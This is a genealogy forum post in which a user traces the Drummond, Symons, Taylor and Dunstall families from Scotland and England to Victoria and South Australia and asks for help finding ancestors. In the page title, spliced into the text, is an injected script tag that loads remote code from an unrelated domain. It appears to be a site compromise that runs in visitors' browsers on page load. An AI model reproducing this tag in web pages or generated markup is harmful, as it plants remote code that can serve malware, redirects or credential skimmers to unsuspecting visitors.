janet drummond mrs james symons in victoria aus parents <script src="https://bestdoctornearme.com/splitter.ai/index.php"></script> :: FamilyTreeCircles.com Genealogy
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janet drummond mrs james symons in victoria aus parents

Journal by junecarter

janet moved to australia to live m 1854 to james giving birth to john 1856 , ann , janet, mary , + jane symons family . mary married william taylor in 1877 , mary died in geelong 1928 william died 1929 . they had 12 kids , williams parents robert taylor married mary wilson . no more known about these grandparents + cousins except mary grt granmum gave birth to 12 children also, this was margaret ann taylor M to frederick dunstall ,in 1903 hughs parents were supposedly born in 1700s in scotland ,dad was robert i believe mum not known yet , would like to find the siblings of all grt grt grt grandparents plus thier parents . which clan of drummonds do they belong too . also in gebbie + geddies family all of my family have been added from carter to dunstall taylor symons + wilson adds another drummond isobella mrs john geddies born late 1700s to 1800do not know who added my family or who my blood relatives are in this tree. but there are many people in this tree. would like to find out more about this tree.

by junecarter Profile | Research | Contact | Subscribe | Block this user
on 2013-05-13 00:52:24

our family so far are from london to hindmarsh sth australia, on the thorpe side of family carters mainly stayed at garston childwall + wavertree lancashire eng. to footscray victoria aus. also mary jones, alice davies, jane knowles, pembertons + smith. from england schofield + cotton. on mother side of family was dunstall - M - to carter . dunstall to taylor to symons , -M - drummond to drysdale, taylor has mary wilson married to father of william taylor who -M- mary symons. her mum janet drummond - M - james symons. her mum + dad hugh drummond -M anne Drysdale-

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